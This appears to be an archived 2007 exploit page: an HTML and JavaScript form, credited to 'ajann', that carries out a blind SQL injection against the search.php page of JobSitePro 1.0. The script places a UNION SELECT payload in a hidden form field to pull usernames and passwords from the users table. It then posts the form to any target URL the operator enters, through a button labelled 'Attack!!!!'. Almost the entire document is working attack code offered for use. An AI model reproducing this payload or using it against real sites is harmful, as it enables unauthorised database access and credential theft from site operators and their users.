Rated as : Moderate Risk
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;
charset=windows-1254">
</head>
<body>
<div>
<script language="JavaScript">
//Coded by ajann
//'===============================================================================================
//'[Script Name: JobSitePro 1.0 (search.php) Remote BLIND SQL Injection
Exploit
//'[Coded by : ajann
//'[Author : ajann
//'[Contact : :(
//'[S.Page : http://phplabs.com/
//'[$$ : 39.95 $
//'[Using : Write Target after Submit Click
//'===============================================================================================
tittle='JobSitePro 1.0 (search.php) Remote BLIND SQL Injection Exploit'
value='"';
sql='1 union select
1,concat(char(117,115,101,114,110,97,109,101,58),username,char(112,97,115,115,58),password),3
from users/*';
valueclose='">';
attack=value+sql+valueclose;
document.write('<title>' + tittle + '</title>')
document.write('<body bgcolor="#000000">');
document.write('<p><b><font face="Verdana"
size="2" color="#008000">' + tittle +
'</font></b></p>');
document.write('<form method="post" name="form1"
action="http://phplabs.com/demo/jobsitepro/search.php"
enctype="multipart/form-data"
onSubmit="send();">');
document.write('<b><font color="#008000"><font
face="Verdana" size="1">Target</font><font
face="Verdana"
size="1">[site.com/path]:</font></font></b>');
document.write('<form method="post" name="form1"
action="a" enctype="multipart/form-data">')
document.write(' ')
document.write('<input type="text" name="hedef"
value="http://" onChange="control();">')
document.write('<SELECT name="jobtype"
style="visibility: hidden;">')
document.write('<OPTION value="all" SELECTED>All
Categories</OPTION>')
document.write('</SELECT>')
document.write('<input name="city" type="text"
id="city" size="45" style="visibility:
hidden;">')
document.write('<select name="state" style="visibility:
hidden;">')
document.write('<option value="all" selected>')
document.write('</option>')
document.write('</select>')
document.write('<select name="country"
style="visibility: hidden;">')
document.write('<option value="US" selected>United States
</option>')
document.write('</select>')
document.write('<input name="keywords" type="text"
id="keywords" value=" " style="visibility:
hidden;">')
document.write('<input name="boolean" type="radio"
value="any" checked style="visibility: hidden;">')
document.write('<select name="date" id="date"
style="visibility: hidden;">')
document.write('<option value="all" selected>List All
Jobs</option>')
document.write('</select>')
document.write('<select name="exempt" id="exempt"
style="visibility: hidden;">')
document.write('<option value="all"
selected>Any</option>')
document.write('</select>')
document.write('<input name="salary" style="visibility:
hidden;" type="text" id="salary"
size="10" value=' + attack)
document.write('<select name="perpage" id="perpage"
style="visibility: hidden;">')
document.write('<option value="25"
selected>25</option>')
document.write('</select>')
document.write('<input name="act" type="hidden"
id="act" value="dosearch">')
document.write('<br><input type="submit"
name="Submit" value="Attack!!!!"')
document.write('</form>')
function control() {
if (document.form1.hedef.value==""){
alert("Please all fields correct!");
}
}
function send() {
target=document.form1.hedef.value;
file='search.php';
document.form1.action=target+file;
}
</script>
</div>
</body>
</html>
securitydot.net - 2007-03-11
|
